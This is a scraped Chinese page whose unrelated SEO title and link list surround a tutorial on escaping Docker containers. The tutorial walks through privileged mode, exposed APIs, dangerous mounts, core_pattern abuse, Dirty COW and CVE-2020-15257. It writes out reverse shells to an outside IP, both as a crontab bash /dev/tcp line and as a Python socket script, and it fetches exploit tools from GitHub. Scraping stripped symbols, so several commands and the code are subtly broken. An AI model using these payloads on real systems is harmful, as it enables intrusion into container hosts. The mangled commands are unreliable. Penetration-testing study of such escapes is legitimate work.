当前位置: 首页 > news >正文

网站建设需要交文化建设税吗徐州城乡建设网站

网站建设需要交文化建设税吗,徐州城乡建设网站,长春网站建设方案详细,股票软件定制开发关于Docker逃逸 文章目录关于Docker逃逸前言一、判断是否为docker容器#xff1f;二、privileged特权模式启动容器逃逸三、 Docker Remote API未授权访问逃逸四、危险挂载导致Docker逃逸五、危险挂载Docker Socket逃逸六、 挂载宿主机procfs逃逸七、脏牛漏洞来进行docker逃逸八…关于Docker逃逸 文章目录关于Docker逃逸前言一、判断是否为docker容器二、privileged特权模式启动容器逃逸三、 Docker Remote API未授权访问逃逸四、危险挂载导致Docker逃逸五、危险挂载Docker Socket逃逸六、 挂载宿主机procfs逃逸七、脏牛漏洞来进行docker逃逸八、CVE-2020-15257逃逸总结前言 Dcoker作为开源容器引擎作为一种操作系统级别虚拟化技术已经被广泛应用于比赛生产测试环境中究其原因是Docker解决了环境部署复杂的问题使应用程序能够进行打包那么在渗透中docker逃逸也必不可少。 一、判断是否为docker容器 直接查看目录是否有docker产生的.dockerenvdockerpoint等文件 查看/proc/self/cgroup是否出现docker标志 查看是否存在/etc/machine-id一般docker没有 二、privileged特权模式启动容器逃逸 当利用特权模式启动容器时docker管理员可以通过mount命令将外部宿主机的磁盘设备挂载进容器内获取宿主机的文件读写权限然后可以通过crontab计划等逃逸到宿主机。 判断是否特全模式启动 cat /proc/self/status |grep Cap对应掩码为0000003fffffffff 在docker中创建目录然后将宿主机的磁盘挂载到新建的目录中 将反弹shell等写入计划任务 echo bash -i /dev/tcp/120.79.29.170/4444 01 /aiwin/aiwin.sh echo * * * * * root bash /aiwin.sh /aiwin/etc/crontab反弹shell成功 原理十分简单特权模式使得宿主机磁盘被挂载到了docker的目录修改docker目录中的/etc/crontab相当于修改了宿主机的/etc/crontab 三、 Docker Remote API未授权访问逃逸 docker swarm用于管理Docker集群docker节点上会开放一个TCP端口2375默认绑定0.0.0.0导致了任何人都开源访问进而控制docker环境。使用vulhub的漏洞环境 cd vulhub-master/docker/unauthorized-rce docker-compose build docker-compose up -d这里启动不成功不知道为什么但是原理就是通过docker利用tcp连接访问2375端口然后从2375端口中拉取镜像再利用特权模式启动最后再通过特权模式写shell进入宿主机进而完成逃逸主要原因是2375管理端口能被任何人使用。 四、危险挂载导致Docker逃逸 这里的危险挂载指的是将宿主机的根目录挂载进了docker机中使得docker能够直接操作宿主机的文件导致逃逸跟特权模式原理相似。 docker run -itd -v /:/aiwin name /bin/bashdocker机的aiwin目录就是宿主机的根目录 直接修改/etc/crontab文件写入反弹shell 反弹shell成功 五、危险挂载Docker Socket逃逸 Docker采用的是C/S架构即客户端服务端格式可以通过以下命令操作目标的docker。 unix:///var/run/docker.sock tcp://host:port fd://socketfd 造成逃逸的原因是将宿主机的/var/run/docker.sock文件挂载到docker容器中导致docker容器中可以操作宿主机的docker进而能新创建docker从而将根目录挂载到新创建的docker中造成逃逸。 将/var/run/docker.sock挂载到docker容器中此时docker容器中会出现/run/docker.sock文件 docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:16.04 /bin/bash在docker容器中安装docker apt-get update apt-get install docker.io在docker容器中使用命令查看宿主机的docker镜像 docker -H unix://var/run/docker.sock images 在docker容器中使用命令再允许一个docker容器并将根目录挂载到docker容器目录中写shell到定时计划 docker -H unix://var/run/docker.sock run -v /:/aiwin -it ubuntu:16.04 /bin/bash5. 写shell与上面一样 六、 挂载宿主机procfs逃逸 procfs中/proc/sys/kernel/core_pattern负责配置进程崩溃时内存转储数据的导出方式当文件中首字符是管道符|该行剩余内容被当作脚本解释执行从而实现docker逃逸触发条件是进程崩溃。 启动容器将/proc/sys/kernel/core_pattern挂载进容器如果找到两个core_pattern那么可能就是挂载了宿主机的procfs docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern 搜索docker容器在宿主机的绝对路径workdir即是 python脚本反弹shell import os import pty import socket lhost 120.79.29.170 lport 4444 def main():s socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((lhost, lport))os.dup2(s.fileno(), 0)os.dup2(s.fileno(), 1)os.dup2(s.fileno(), 2)os.putenv(HISTFILE, /dev/null)pty.spawn(/bin/bash)s.close() if __name__ __main__:main()修改/host/proc/sys/kernel/core_pattern从而修改掉/proc/sys/kernel/core_pattern文件以管道符开头使得python脚本被执行 chmod 777 /tmp/.t.py echo -e |/绝对路径/merged/脚本位置 \rcore /host/proc/sys/kernel/core_pattern5. 创建使容器崩溃的程序编译运行反弹shell成功。 #includestdio.h int main(void) {int *a NULL;*a 1;return 0; }简单的NULL陷阱没有为a开辟内存又给a赋值使得程序崩溃。 七、脏牛漏洞来进行docker逃逸 脏牛漏洞的成因是get_user_page内核函数在处理Copy-on-Write过程时可能产生竞态条件导致出现了能够写数据到进程空间只读内存区域的机会。 linux中存在VDSO小型共享库能将内核自动映射到用户程序的地址空间即将内核函数映射到内存。 当linux存在脏牛漏洞时我们可以利用脏牛漏洞获取到内存的写权限便可以写入shellcode到VDSO中使得调用正常函数时执行shellcode进而反弹shell从而实现dokcer逃逸。 拉取Ubuntu14.04.5版本进行复现存在脏牛漏洞 git clone https://github.com/scumjr/dirtycow-vdso.git cd /dirtycow-vdso/ make5. 执行文件反弹shell这里虽然显示失败了但是反弹shell却成功了 八、CVE-2020-15257逃逸 在host模式下启动时容器和host共享一套Network且内部UID为0时使得容器中的程序可以访问宿主的 containerd 控制API导致逃逸。 影响版本 containerd 1.4.3 containerd 1.3.9 下载指定的docker版本使用–neithost启动镜像 docker pull ubuntu:18.04 docker run -itd --nethost ubuntu:18.04 /bin/bash docker exec -it 5be3ed60f152 /bin/bash使用wget下载exp并解压 cd /tmp wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz执行exp即可反弹shell 总结 总的来说docker逃逸大部分原因都是配置出现的错误导致能够在docker机里面直接修改宿主机的一些文件包括挂载了socket、procfs、/等只有少部分是由于内核漏洞导致的所以处理好配置问题docker逃逸应该挺难。 参考文章
http://www.tj-hxxt.cn/news/218953.html

相关文章:

  • 模仿建设银行网站上海网站建设哪个平台好
  • 关于开展网站建设工作的通知成全视频免费观看在线看城南
  • 帮忙做网站川汇网站建设
  • jsp可以做网站首页吗漳州seo建站
  • 长治专业做网站虚拟主机免费云服务器
  • 下载建设网站软件培训中心网站建设论文
  • 彩票网站建设哪里嘉兴网站建设优化
  • 网站源码如何优化只做网站的
  • 高端企业网站开发wordpress 淘宝客 采集
  • 西安网站开发公司地址房地产基础知识300问
  • 自已电脑做网站服务器刚做的婚恋网站怎么推广
  • 网站怎么放到服务器百度网网页版登录
  • 网站建设大致分哪几块长沙工商注册网上登记
  • 黄页推广引流网站建设网证书查询平台官网
  • 成交型网站建设价格如何在自己网站做解析api
  • 阿里云服务器做网站django制作相册音乐相册模板
  • 网站工程是干啥的iis网站发布教程
  • 天津网站建设培训wordpress添加
  • 百度做一个网站怎么做呢内容分享网站设计
  • 网站开发哈尔滨网站开发公司电话门店管理系统软件免费
  • 怎么查看一个网站的浏览量某购物网站建设方案
  • 单位的网站的建设方案怎么做网页界面
  • 网站开发属于什么行业北京品牌网站定制公司
  • 空白网站怎么建国外网站设计案例
  • 团购网站模板下载深圳中光建设有限公司
  • wordpress的网站国内网学服装设计培训哪里好
  • 行业资讯网站源码可以建网站的路由器
  • php网站栏目 添加和删除网站系统使用手册
  • 织梦网站移动化免费的韩国网站服务器
  • 西安企业网站建设公司个人网页制作简单方法